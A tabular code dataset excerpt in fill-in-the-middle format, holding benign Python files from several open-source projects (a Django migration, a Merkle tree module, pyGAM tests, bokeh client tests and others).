repo_name stringlengths 5 100 | path stringlengths 4 231 | language stringclasses 1 value | license stringclasses 15 values | size int64 6 947k | score float64 0 0.34 | prefix stringlengths 0 8.16k | middle stringlengths 3 512 | suffix stringlengths 0 8.17k |
|---|---|---|---|---|---|---|---|---|
MrSenko/Nitrate | tcms/testcases/migrations/0001_initial.py | Python | gpl-2.0 | 9,258 | 0.002916 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import tcms.core.models.base
from django.conf import setti | ngs
import tcms.core.models.fields
class Migration(migrations.Migration):
dependencies = [
('management', '0001_initial'),
('testplans', '0001_init | ial'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Contact',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('object_pk', models.PositiveIntegerField(null=True, verbose_name=b'object ID', blank=True)),
('name', models.CharField(max_length=50)),
('email', models.EmailField(max_length=254, db_index=True)),
('date_joined', models.DateTimeField(auto_now_add=True)),
],
options={
'db_table': 'tcms_contacts',
},
),
migrations.CreateModel(
name='TestCase',
fields=[
('case_id', models.AutoField(max_length=10, serialize=False, primary_key=True)),
('create_date', models.DateTimeField(auto_now_add=True, db_column=b'creation_date')),
('is_automated', models.IntegerField(default=0, db_column=b'isautomated')),
('is_automated_proposed', models.BooleanField(default=False)),
('script', models.TextField(blank=True)),
('arguments', models.TextField(blank=True)),
('extra_link', models.CharField(default=None, max_length=1024, null=True, blank=True)),
('summary', models.CharField(max_length=255, blank=True)),
('requirement', models.CharField(max_length=255, blank=True)),
('alias', models.CharField(max_length=255, blank=True)),
('estimated_time', tcms.core.models.fields.DurationField(default=0, db_column=b'estimated_time')),
('notes', models.TextField(blank=True)),
],
options={
'db_table': 'test_cases',
},
bases=(models.Model, tcms.core.models.base.UrlMixin),
),
migrations.CreateModel(
name='TestCaseAttachment',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
],
options={
'db_table': 'test_case_attachments',
},
),
migrations.CreateModel(
name='TestCaseBug',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('bug_id', models.CharField(max_length=25)),
('summary', models.CharField(max_length=255, null=True, blank=True)),
('description', models.TextField(null=True, blank=True)),
],
options={
'db_table': 'test_case_bugs',
},
bases=(models.Model, tcms.core.models.base.UrlMixin),
),
migrations.CreateModel(
name='TestCaseBugSystem',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=255)),
('description', models.TextField(blank=True)),
('url_reg_exp', models.CharField(max_length=8192)),
('validate_reg_exp', models.CharField(max_length=128)),
],
options={
'db_table': 'test_case_bug_systems',
},
bases=(models.Model, tcms.core.models.base.UrlMixin),
),
migrations.CreateModel(
name='TestCaseCategory',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, db_column=b'category_id')),
('name', models.CharField(max_length=255)),
('description', models.TextField(blank=True)),
('product', models.ForeignKey(related_name='category', to='management.Product')),
],
options={
'db_table': 'test_case_categories',
'verbose_name_plural': 'test case categories',
},
bases=(models.Model, tcms.core.models.base.UrlMixin),
),
migrations.CreateModel(
name='TestCaseComponent',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('case', models.ForeignKey(to='testcases.TestCase')),
('component', models.ForeignKey(to='management.Component')),
],
options={
'db_table': 'test_case_components',
},
),
migrations.CreateModel(
name='TestCaseEmailSettings',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('notify_on_case_update', models.BooleanField(default=False)),
('notify_on_case_delete', models.BooleanField(default=False)),
('auto_to_case_author', models.BooleanField(default=False)),
('auto_to_case_tester', models.BooleanField(default=False)),
('auto_to_run_manager', models.BooleanField(default=False)),
('auto_to_run_tester', models.BooleanField(default=False)),
('auto_to_case_run_assignee', models.BooleanField(default=False)),
('case', models.OneToOneField(related_name='email_settings', to='testcases.TestCase')),
],
),
migrations.CreateModel(
name='TestCasePlan',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('sortkey', models.IntegerField(null=True, blank=True)),
('case', models.ForeignKey(to='testcases.TestCase')),
('plan', models.ForeignKey(to='testplans.TestPlan')),
],
options={
'db_table': 'test_case_plans',
},
),
migrations.CreateModel(
name='TestCaseStatus',
fields=[
('id', models.AutoField(max_length=6, serialize=False, primary_key=True, db_column=b'case_status_id')),
('name', models.CharField(max_length=255)),
('description', models.TextField(null=True, blank=True)),
],
options={
'db_table': 'test_case_status',
'verbose_name': 'Test case status',
'verbose_name_plural': 'Test case status',
},
bases=(models.Model, tcms.core.models.base.UrlMixin),
),
migrations.CreateModel(
name='TestCaseTag',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('user', models.IntegerField(default=b'0', db_column=b'userid')),
('case', models.ForeignKey(to='testcases.TestCase')),
('tag', models.ForeignKey(to='management.TestTag')),
],
options={
'db_table': 'test_case_tags',
},
),
migrations.CreateModel(
name='TestCaseText',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('case_text_version', models.IntegerField()),
('create_date', models.DateTimeField(auto_now_add=True, db_column=b'creation_ts')),
('action', models.TextField(blank=True)),
('effect', models.TextField(blank=True)),
('setup', models.TextField(blank=True)),
('breakdown', models.TextField(blank=True)),
|
Yukarumya/Yukarum-Redfoxes | testing/mozharness/mozharness/mozilla/merkle.py | Python | mpl-2.0 | 6,058 | 0.002146 | #!/usr/bin/env python
import struct
def _round2(n):
k = 1
while k < n:
k <<= 1
return k >> 1
def _leaf_hash(hash_fn, leaf):
return hash_fn(b'\x00' + leaf).digest()
def _pair_hash(hash_fn, left, right):
return hash_fn(b'\x01' + left + right).digest()
class InclusionProof:
"""
Represents a Merkle inclusion proof for purposes of serialization,
deserialization, and verification of the proof. The format for inclusion
proofs in RFC 6962-bis is as follows:
opaque LogID<2..127>; |
opaque NodeHash<32..2^8-1>;
struct {
LogID log_id;
uint64 tree_size;
uint64 leaf_inde | x;
NodeHash inclusion_path<1..2^16-1>;
} InclusionProofDataV2;
In other words:
- 1 + N octets of log_id (currently zero)
- 8 octets of tree_size = self.n
- 8 octets of leaf_index = m
- 2 octets of path length, followed by
* 1 + N octets of NodeHash
"""
# Pre-generated 'log ID'. Not used by Firefox; it is only needed because
# there's a slot in the RFC 6962-bis format that requires a value at least
# two bytes long (plus a length byte).
LOG_ID = b'\x02\x00\x00'
def __init__(self, tree_size, leaf_index, path_elements):
self.tree_size = tree_size
self.leaf_index = leaf_index
self.path_elements = path_elements
@staticmethod
def from_rfc6962_bis(serialized):
start = 0
read = 1
if len(serialized) < start + read:
raise Exception('Inclusion proof too short for log ID header')
log_id_len, = struct.unpack('B', serialized[start:start+read])
start += read
start += log_id_len # Ignore the log ID itself
read = 8 + 8 + 2
if len(serialized) < start + read:
raise Exception('Inclusion proof too short for middle section')
tree_size, leaf_index, path_len = struct.unpack('!QQH', serialized[start:start+read])
start += read
path_elements = []
end = 1 + log_id_len + 8 + 8 + 2 + path_len
while start < end:
read = 1
if len(serialized) < start + read:
raise Exception('Inclusion proof too short for middle section')
elem_len, = struct.unpack('!B', serialized[start:start+read])
start += read
read = elem_len
if len(serialized) < start + read:
raise Exception('Inclusion proof too short for middle section')
if end < start + read:
raise Exception('Inclusion proof element exceeds declared length')
path_elements.append(serialized[start:start+read])
start += read
return InclusionProof(tree_size, leaf_index, path_elements)
def to_rfc6962_bis(self):
inclusion_path = b''
for step in self.path_elements:
step_len = struct.pack('B', len(step))
inclusion_path += step_len + step
middle = struct.pack('!QQH', self.tree_size, self.leaf_index, len(inclusion_path))
return self.LOG_ID + middle + inclusion_path
def _expected_head(self, hash_fn, leaf, leaf_index, tree_size):
node = _leaf_hash(hash_fn, leaf)
# Compute indicators of which direction the pair hashes should be done.
# Derived from the PATH logic in draft-ietf-trans-rfc6962-bis
lr = []
while tree_size > 1:
k = _round2(tree_size)
left = leaf_index < k
lr = [left] + lr
if left:
tree_size = k
else:
tree_size = tree_size - k
leaf_index = leaf_index - k
assert(len(lr) == len(self.path_elements))
for i, elem in enumerate(self.path_elements):
if lr[i]:
node = _pair_hash(hash_fn, node, elem)
else:
node = _pair_hash(hash_fn, elem, node)
return node
def verify(self, hash_fn, leaf, leaf_index, tree_size, tree_head):
return self._expected_head(hash_fn, leaf, leaf_index, tree_size) == tree_head
class MerkleTree:
"""
Implements a Merkle tree on a set of data items following the
structure defined in RFC 6962-bis. This allows us to create a
single hash value that summarizes the data (the 'head'), and an
'inclusion proof' for each element that connects it to the head.
https://tools.ietf.org/html/draft-ietf-trans-rfc6962-bis-24
"""
def __init__(self, hash_fn, data):
self.n = len(data)
self.hash_fn = hash_fn
# We cache intermediate node values, as a dictionary of dictionaries,
# where the node representing data elements data[m:n] is represented by
# nodes[m][n]. This corresponds to the 'D[m:n]' notation in RFC
# 6962-bis. In particular, the leaves are stored in nodes[i][i+1] and
# the head is nodes[0][n].
self.nodes = {}
for i in range(self.n):
self.nodes[i, i+1] = _leaf_hash(self.hash_fn, data[i])
def _node(self, start, end):
if (start, end) in self.nodes:
return self.nodes[start, end]
k = _round2(end - start)
left = self._node(start, start + k)
right = self._node(start + k, end)
node = _pair_hash(self.hash_fn, left, right)
self.nodes[start, end] = node
return node
def head(self):
return self._node(0, self.n)
def _relative_proof(self, target, start, end):
n = end - start
k = _round2(n)
if n == 1:
return []
elif target - start < k:
return self._relative_proof(target, start, start + k) + [self._node(start + k, end)]
elif target - start >= k:
return self._relative_proof(target, start + k, end) + [self._node(start, start + k)]
def inclusion_proof(self, leaf_index):
path_elements = self._relative_proof(leaf_index, 0, self.n)
return InclusionProof(self.n, leaf_index, path_elements)
|
morucci/repoxplorer | repoxplorer/controllers/projects.py | Python | apache-2.0 | 2,146 | 0 | # Copyright 2017, Fabien Boucher
# Copyright 2017, Red Hat
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTI | ES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from collections import OrderedDict
from pecan import abort
from pecan import expose
from repoxplorer import version
from repoxplorer.index.projects | import Projects
rx_version = version.get_version()
class ProjectsController(object):
@expose('json')
def projects(self, pid=None):
projects_index = Projects()
if pid:
project = projects_index.get(pid)
if not project:
abort(404, detail="Project ID has not been found")
return {pid: projects_index.get(pid)}
else:
projects = projects_index.get_projects(
source=['name', 'description', 'logo', 'refs'])
_projects = OrderedDict(
sorted(list(projects.items()), key=lambda t: t[0]))
return {'projects': _projects,
'tags': projects_index.get_tags()}
@expose('json')
def repos(self, pid=None, tid=None):
projects_index = Projects()
if not pid and not tid:
abort(404,
detail="A tag ID or project ID must be passed as parameter")
if pid:
project = projects_index.get(pid)
else:
if tid in projects_index.get_tags():
refs = projects_index.get_references_from_tags(tid)
project = {'refs': refs}
else:
project = None
if not project:
abort(404,
detail='Project ID or Tag ID has not been found')
return project['refs']
|
asiroliu/AnalysisWinPIRALog | AnalysisWinPIRALog_LINUX.py | Python | gpl-2.0 | 14,575 | 0.003019 | # coding=utf-8
from __future__ import absolute_import, division, print_function, unicode_literals
"""
Name: AnalysisWinPIRALog_LINUX
Author: Andy Liu
Email : andy.liu.ud@hotmail.com
Created: 3/24/2015
Copyright: Copyright ©Intel Corporation. All rights reserved.
Licence: This program is free software: you can redistribute it
and/or modify it under the terms of the GNU General Public License
as published by the Free Software Foundation, either version 3 of
the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import argparse
import logging
import os
import re
import sys
import xlwt
from copy import deepcopy
from pprint import pformat
from AnalysisWinPIRALog.MyLog import init_logger
from encoder import XML2Dict
class AnalysisLog:
def __init__(self, _config_file, _log_file):
self._config_file = _config_file
self._log_file = _log_file
self.config_dict = dict()
self.log_dict = dict()
self.result_list = list()
self.start = re.compile(r'^[0-9a-f]{2}:[0-9a-f]{2}\.\d')
self._key_word = 'DEV_NAME'
self.return_value = True
def parse_config_file(self):
logging.debug('Into function parse_config_file')
with open(self._config_file, 'r') as f:
_xml_str = f.read()
try:
_obj = XML2Dict(coding='utf-8')
self.config_dict = _obj.parse(_xml_str)
logging.debug('config_dict : %s' % pformat(self.config_dict))
logging.info('Parse config file done')
return self.config_dict
except Exception, e:
logging.error("Can't parse as XML!")
logging.exception(e)
sys.exit(1)
# def warning_duplicate_dev_add(self):
# logging.debug('Into warning_duplicate_dev_add')
# _verify_list = list()
# for _dev_type, _expect_values in self.config_dict.get('xml').iteritems():
# if isinstance(_expect_values, list):
# for _expect_value in _expect_values:
# if _expect_value.get(self._key_word) in _verify_list:
# logging.error('Duplicate device address : %s' % _expect_value.get(self._key_word))
# sys.exit(1)
# else:
# _verify_list.append(_expect_value.get(self._key_word))
# elif isinstance(_expect_values, dict):
# if _expect_values.get(self._key_word) in _verify_list:
# logging.error('Duplicate device address : %s' % _expect_values.get(self._key_word))
# sys.exit(1)
# else:
# _verify_list.append(_expect_values.get(self._key_word))
# if len(_verify_list) == 0:
# logging.error("Can't find key word <%s>" % self._key_word)
# sys.exit(1)
# logging.info('Verify duplicate device address done')
# return True
def parse_log_file(self):
logging.debug('Into parse_log_file')
_record = dict()
_dev_name = ''
with open(self._log_file, 'r') as f:
# remove header and footer in log file
for _line in f.readlines():
_line = _line.strip()
if _line and ':' in _line:
if re.findall(self.start, _line):
if _record:
self.log_dict.update({_dev_name.strip(): deepcopy(_record)})
_record.clear()
_bus_no, _dev_name = _line.split(' ', 1)
_record.update({'BUS_NO': _bus_no.strip(), 'DEV_NAME': _dev_name.strip()})
else:
_key, _value = _line.split(':', 1)
_record.update({_key.strip(): _value.strip()})
else:
self.log_dict.update({_dev_name.strip(): deepcopy(_record)})
pass
logging.debug('log_dict : %s' % pformat(self.log_dict))
logging.info('Parse log file done')
return self.log_dict
def verify_result(self):
for _dev_type, _expect_values in self.config_dict.get('xml').iteritems():
if isinstance(_expect_values, list):
logging.debug('_expect_values is list')
for _expect_value in _expect_values:
_key_word = _expect_value.get(self._key_word)
if _key_word in self.log_dict:
_record = self.log_dict.get(_key_word)
if self.compare_result(_expect_value, _record):
_record.update({'Result': 'PASSED'})
else:
_record.update({'Result': 'FAILED'})
self.return_value = False
self.result_list.append(_record)
else:
self.result_list.append({self._key_word: _key_word, 'Result': 'Not Found'})
self.return_value = False
elif isinstance(_expect_values, dict):
logging.debug('_expect_values is dict')
_key_word = _expect_values.get(self._key_word)
if _key_word in self.log_dict:
_record = self.log_dict.get(_key_word)
if self.compare_result(_expect_values, _record):
_record.update({'Result': 'PASSED'})
else:
_record.update({'Result': 'FAILED'})
self.return_value = False
self.result_list.append(_record)
else:
self.result_list.append({self._key_word: _key_word, 'Result': 'Not Found'})
self.return_value = False
logging.debug('result_list : %s' % pformat(self.result_list))
logging.info('Verify result done')
@staticmethod
def compare_result(_expect_value, _record):
"""
expect_value:
{'DEV_NAME': 'PCI bridge: Intel Corporation Haswell-E PCI Express Root Port 1 (rev 02) (prog-if 00 [Normal decode])'}
_record:
{'ACSCap': 'SrcValid+ TransBlk+ ReqRedir+ CmpltRedir+ UpstreamFwd+ EgressCtrl- DirectTrans-',
'ACSCtl': 'SrcValid- TransBlk- ReqRedir- CmpltRedir- UpstreamFwd- EgressCtrl- DirectTrans-',
'AERCap': 'First Error Pointer: 00, GenCap- CGenEn- ChkCap- ChkEn-',
'Address': 'fee00438 Data: 0000',
'BUS_NO': '00:01.0',
'BridgeCtl': 'Parity+ SERR+ NoISA- VGA- MAbort- >Reset- FastB2B-',
'Bus': 'primary=00, secondary=01, subordinate=01, sec-latency=0',
'CEMsk': 'RxErr- BadTLP- BadDLLP- Rollover- Timeout- NonFatalErr-',
'CESta': 'RxErr- BadTLP- BadDLLP- Rollover- Timeout- NonFatalErr-',
'Capabilities': '[300 v1] Vendor Specific Information: ID=0008 Rev=0 Len=038 <?>',
'Changed': 'MRL- PresDet- LinkState+',
'Compliance De-emphasis': '-6dB',
'Control': 'AttnInd Off, PwrInd O | ff, Power- Interlock-',
'DEV_NAME': 'PCI bridge: Intel Corporation Haswell-E PCI Express Root Port 1 (rev 02) (prog-if 00 [Normal decode])',
'DevCap': 'MaxPayload 256 bytes, PhantFunc 0, Latency L0s <64ns, L1 <1us',
'DevCap2': 'Completion Timeout: Range BCD, TimeoutDis+, LTR-, OBFF Not Supported ARIFwd+',
'DevCtl': 'Report errors: Correctable- Non-Fatal+ Fatal+ Unsupported-',
| 'DevCtl2': 'Completion Timeout: 260ms to 900ms, TimeoutDis-, LTR-, OBFF Disabled ARIFwd+',
'DevSta': 'CorrErr- UncorrErr- FatalErr- UnsuppReq- AuxPwr- TransPend-',
'Flags': 'PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+)',
'I/O behind bridge': '0000f000-00000fff',
'Kernel drive |
jim-cooley/abletonremotescripts | remote-scripts/samples/Launchpad95/__init__.py | Python | apache-2.0 | 425 | 0.016471 | from Launchpad import Launchpad
def create_instance(c_instance):
""" Creates and returns the Launchpad script """
return Launchpad(c_instance)
from _Framework.Capab | ilities import | * # noqa
def get_capabilities():
return {
CONTROLLER_ID_KEY: controller_id(vendor_id=4661, product_ids=[14], model_name='Launchpad'),
PORTS_KEY: [inport(props=[NOTES_CC, REMOTE, SCRIPT]), outport(props=[NOTES_CC, REMOTE, SCRIPT])]}
|
chambers-brian/SIG_Digital-Strategy_SI_ODP_Backend | dataactvalidator/scripts/loadFile.py | Python | cc0-1.0 | 4,378 | 0.001142 | import os
import logging
import pandas as pd
from dataactvalidator.app import createApp
from dataactvalidator.scripts.loaderUtils import LoaderUtils
from dataactcore.interfaces.db import GlobalDB
from dataactcore.models.domainModels import CGAC, ObjectClass, ProgramActivity
from dataactcore.config import CONFIG_BROKER
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
def loadCgac(filename):
"""Load CGAC (high-level agency names) lookup table."""
model = CGAC
with createApp().app_context():
sess = GlobalDB.db().session
# for CGAC, delete and replace values
sess.query(model).delete()
# read CGAC values from csv
data = pd.read_csv(filename, dtype=str)
# clean data
data = LoaderUtils.cleanData(
data,
model,
{"cgac": "cgac_code", "agency": "agency_name"},
{"cgac_code": {"pad_to_length": 3}}
)
# de-dupe
data.drop_duplicates(subset=['cgac_code'], inplace=True)
# insert to db
table_name = model.__table__.name
num = LoaderUtils.insertDataframe(data, table_name, sess.connection())
sess.commit()
logger.info('{} records inserted to {}'.format(num, table_name))
def loadObjectClass(filename):
"""Load object class lookup table."""
model = ObjectClass
with createApp().app_context():
sess = GlobalDB.db().session
# for object class, delete and replace values
sess.query(model).delete()
data = pd.read_csv(filename, dtype=str)
data = LoaderUtils.cleanData(
data,
model,
{"max_oc_code": "object_class_code",
"max_object_class_name": "object_class_name"},
{}
)
# de-dupe
data.drop_duplicates(subset=['object_class_code'], inplace=True)
# insert to db
table_name = model.__table__.name
num = LoaderUtils.insertDataframe(data, table_name, sess.connection())
sess.commit()
logger.info('{} records inserted to {}'.format(num, table_name))
def loadProgramActivity(filename):
"""Load program activity lookup table."""
model = ProgramActivity
with createApp().app_context():
sess = GlobalDB.db().session
# for program activity, delete and replace values??
sess.query(model).delete()
data = pd.read_csv(filename, dtype=str)
data = LoaderUtils.cleanData(
data,
model,
{"year": "budget_year",
"agency_id": "agency_id",
"alloc_id": "allocation_transfer_id",
"account": "account_number",
"pa_code": "program_activity_code",
"pa_name": "program_activity_name"},
{"program_activity_code": {"pad_to_length": 4},
"ag | ency_id": {"pad_to_length": 3},
"allocation_transfer_id": {"pad_to_length": 3, "keep_null": True},
"account_number": {"pad_to_length": 4}
}
)
# because we're only loading a subset of program activity info,
# | there will be duplicate records in the dataframe. this is ok,
# but need to de-duped before the db load.
data.drop_duplicates(inplace=True)
# insert to db
table_name = model.__table__.name
num = LoaderUtils.insertDataframe(data, table_name, sess.connection())
sess.commit()
logger.info('{} records inserted to {}'.format(num, table_name))
def loadDomainValues(basePath, localProgramActivity = None):
"""Load all domain value files.
Parameters
----------
basePath : directory that contains the domain values files.
localProgramActivity : optional location of the program activity file (None = use basePath)
"""
logger.info('Loading CGAC')
loadCgac(os.path.join(basePath,"cgac.csv"))
logger.info('Loading object class')
loadObjectClass(os.path.join(basePath,"object_class.csv"))
logger.info('Loading program activity')
if localProgramActivity is not None:
loadProgramActivity(localProgramActivity)
else:
loadProgramActivity(os.path.join(basePath, "program_activity.csv"))
if __name__ == '__main__':
loadDomainValues(
os.path.join(CONFIG_BROKER["path"], "dataactvalidator", "config")
)
|
kurikaesu/pytrade | PyTrade/source/models/user.py | Python | gpl-3.0 | 2,792 | 0.001074 | from ..core import *
class User:
# Data header indexes
USERNAME = 0
ENCRYPTED_NAME = 1
SALT = 2
PROFILE = 3
# data header in the user table
COLUMN_HEADERS = [
'username',
'encrypted_name',
'salt',
'profile',
]
# variables to be stored in db
__id = None
__username = None
__encrypted_name = None
__salt = None
__profile = None
# variables for runtime
__crypt = None
__data = {'column_headers': COLUMN_HEADERS}
def __init__(self, username):
self.__username = username
self.__profile = ' '
@ | classmethod
def load_user(cls, username, encrypted_username, salt):
user = cls(username)
user.set_salt(salt)
user.set_encrypted_name(encrypted_username)
return cls(username)
def set_salt(self, salt=None):
self.__crypt = Crypt()
if not salt:
salt = Crypt.gen_salt()
self.__crypt.setSalt(salt)
self.__salt = salt
def set_encrypted_name(self, encrypted_username):
self.__encrypted_name = encrypted_username
| def get_username(self):
return self.__username
def get_id(self):
return self.__id
def set_id(self, id):
self.__id = id
print(id)
def get_data(self):
return self.__data
# Wrap user data into a structure for storing into db
def save_data(self):
if not self.__username:
raise RuntimeWarning("Username is not set")
if not self.__encrypted_name:
raise RuntimeWarning("Username is not encrypted")
if not self.__salt:
raise RuntimeWarning("Salt is not created")
if not self.__profile:
raise RuntimeWarning("Profile in not initialised")
# decode all values before storing them in db
self.__data[self.COLUMN_HEADERS[self.USERNAME]] = self.__username.decode()
self.__data[self.COLUMN_HEADERS[self.ENCRYPTED_NAME]] = self.__encrypted_name.decode()
self.__data[self.COLUMN_HEADERS[self.SALT]] = self.__salt.decode()
self.__data[self.COLUMN_HEADERS[self.PROFILE]] = self.__profile
def set_password(self, raw_password):
self.set_salt()
self.__crypt.initWithPassword(raw_password)
self.__encrypted_name = self.__crypt.encryptBytes(self.get_username())
pass
def validate_password(self, raw_password):
if not self.__salt:
raise RuntimeWarning("Password is not set")
res = self.__crypt.validatePassword(
raw_password,
self.__encrypted_name,
self.__username
)
if res:
return True
else:
return False
def get_profile(self):
pass
|
dswah/pyGAM | pygam/tests/test_GAMs.py | Python | apache-2.0 | 2,344 | 0.00384 | # -*- coding: utf-8 -*-
import pytest
from pygam import *
def test_can_build_sub_models():
"""
check that the inits of all the sub-models are correct
"""
LinearGAM()
LogisticGAM()
PoissonGAM()
GammaGAM()
InvGaussGAM()
ExpectileGAM()
assert(True)
def test_LinearGAM_uni(mcycle_X_y):
"""
check that we can fit a Linear GAM on real, univariate data
"""
X, y = mcycle_X_y
gam = LinearGAM().fit(X, y)
assert(gam._is_fitted)
def test_LinearGAM_multi(wage_X_y):
"""
check that we can fit a Linear GAM on real, multivariate data
"""
X, y = wage_X_y
gam = LinearGAM().fit(X, y)
assert(gam._is_fitted)
def test_LogisticGAM(default_X_y):
"""
check that we can fit a Logistic GAM on real data
"""
X, y = default_X_y
gam = LogisticGAM().fit(X, y)
assert(gam._is_fitted)
def test_PoissonGAM(coal_X_y):
"""
check that we can fit a Poisson GAM on real data
"""
X, y = coal_X_y
gam = PoissonGAM().fit(X, y)
assert(gam._is_fitted)
def test_InvGaussGAM(tree | s_X_y):
"""
check that we can fit a InvGauss GAM on real data
"""
X, y = trees_X_y
gam = InvGaussGAM().fit(X, y)
assert(gam._is_fitted)
def test_GammaGAM(trees_X_y):
"""
check that we can fit a Gamma GAM on real data
"""
X, y = trees_X_y
gam = GammaGAM().fit(X, y)
assert(gam._is_fitted)
def test_CustomGAM(trees_X_y):
"""
| check that we can fit a Custom GAM on real data
"""
X, y = trees_X_y
gam = GAM(distribution='gamma', link='inverse').fit(X, y)
assert(gam._is_fitted)
def test_ExpectileGAM_uni(mcycle_X_y):
"""
check that we can fit an Expectile GAM on real, univariate data
"""
X, y = mcycle_X_y
gam = ExpectileGAM().fit(X, y)
assert(gam._is_fitted)
def test_ExpectileGAM_bad_expectiles(mcycle_X_y):
"""
check that get errors for unacceptable expectiles
"""
X, y = mcycle_X_y
with pytest.raises(ValueError):
ExpectileGAM(expectile=0).fit(X, y)
with pytest.raises(ValueError):
ExpectileGAM(expectile=1).fit(X, y)
with pytest.raises(ValueError):
ExpectileGAM(expectile=-0.1).fit(X, y)
with pytest.raises(ValueError):
ExpectileGAM(expectile=1.1).fit(X, y)
# TODO check dicts: DISTRIBUTIONS etc
|
markuz/poster | poster_resources/__init__.py | Python | gpl-3.0 | 988 | 0.001012 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# This file is part of the Poster project
#
# Copyright (c) 2006-2009 Marco Antonio Islas Cruz
#
# Poster is free software; you can redistribute it and/or modify
# it under the terms of the GNU | General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Poster is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program | ; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
# @author Marco Antonio Islas Cruz <markuz@islascruz.org>
# @copyright 2011 Marco Antonio Islas Cruz
# @license http://www.gnu.org/licenses/gpl.txt |
bjtrost/TCAG-WGS-CNV-workflow | CNVnator.py | Python | mit | 1,274 | 0.067504 |
import SV
import os
import re
class CNVnator:
match_calltype={'deletion':'DEL', 'duplication':'DUP'}
CNVtype=0
coordinates=1
CNVsize=2
normalizedRD=3
eval1=4
eval2=5
eval3=6
eval4=7
q0=8
@staticmethod
def parse_coordinates (coordinates):
coord=re.sub (':', '-', coordinates)
E=coord.split ('-')
return E[0], E[1], E[2]
@staticmethod
def doparse ( cnvnator_line ):
E=cnvnator_line.rstrip('\n').split('\t')
chrom, start, end=CNVnator.parse_coordinates(E[CNVnator.coordinates])
calltype=CNVnator.match_calltype[E[CNVnator.CNVtype]]
length=E[CNVnator.CNVsize]
filter=E[CNVnator.eval1]
program='CNVnator'
other=":".join (E)
return SV.SV.format_line (chrom, start, end, calltype, filter, program, other, str(length))
# ------------------------------------------------------------
def __init__ (self, fname):
self.fname=fname
if not os.path.exists (self.fname):
raise Exception ("NO such file: " + self.fname)
# -------------------------------------------------------------
def run ( self ):
f = open (self.fname)
for line in f:
if line[0] == '#': continue
sv_line=CNVnator | .doparse ( line )
if sv_line is not None: print(sv_line)
f.close()
# ---------------------- | ---------------------------------------
|
mindriot101/bokeh | bokeh/client/tests/test_session.py | Python | bsd-3-clause | 6,568 | 0.004415 | #-----------------------------------------------------------------------------
# Co | pyright (c) 2012 - 2018, Anaconda, Inc. All rights reserved.
#
# Powered by the Bokeh Development Team.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
#----------------------------------------------------------------- | ------------
# Boilerplate
#-----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function, unicode_literals
import pytest ; pytest
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Standard library imports
from mock import patch
# External imports
from six import string_types
# Bokeh imports
# Module under test
import bokeh.client.session as bcs
#-----------------------------------------------------------------------------
# Setup
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# General API
#-----------------------------------------------------------------------------
def test_module_docstring_warning():
assert bcs._BOKEH_CLIENT_APP_WARNING_BODY in bcs.__doc__
def test_DEFAULT_SESSION_ID():
assert bcs.DEFAULT_SESSION_ID == "default"
def test_DEFAULT_SERVER_WEBSOCKET_URL():
assert bcs.DEFAULT_SERVER_WEBSOCKET_URL == "ws://localhost:5006/ws"
class Test_ClientSession(object):
def test_creation_defaults(self):
s = bcs.ClientSession()
assert s.connected == False
assert s.document is None
assert s._connection._arguments is None
assert isinstance(s.id, string_types)
assert len(s.id) == 44
def test_creation_with_session_id(self):
s = bcs.ClientSession("sid")
assert s.connected == False
assert s.document is None
assert s._connection._arguments is None
assert s.id == "sid"
def test_creation_with_ws_url(self):
s = bcs.ClientSession(websocket_url="wsurl")
assert s.connected == False
assert s.document is None
assert s._connection._arguments is None
assert s._connection.url == "wsurl"
assert isinstance(s.id, string_types)
assert len(s.id) == 44
def test_creation_with_ioloop(self):
s = bcs.ClientSession(io_loop="io_loop")
assert s.connected == False
assert s.document is None
assert s._connection._arguments is None
assert s._connection.io_loop == "io_loop"
assert isinstance(s.id, string_types)
assert len(s.id) == 44
def test_creation_with_arguments(self):
s = bcs.ClientSession(arguments="args")
assert s.connected == False
assert s.document is None
assert s._connection._arguments == "args"
assert len(s.id) == 44
@patch("bokeh.client.connection.ClientConnection.connect")
def test_connect(self, mock_connect):
s = bcs.ClientSession()
s.connect()
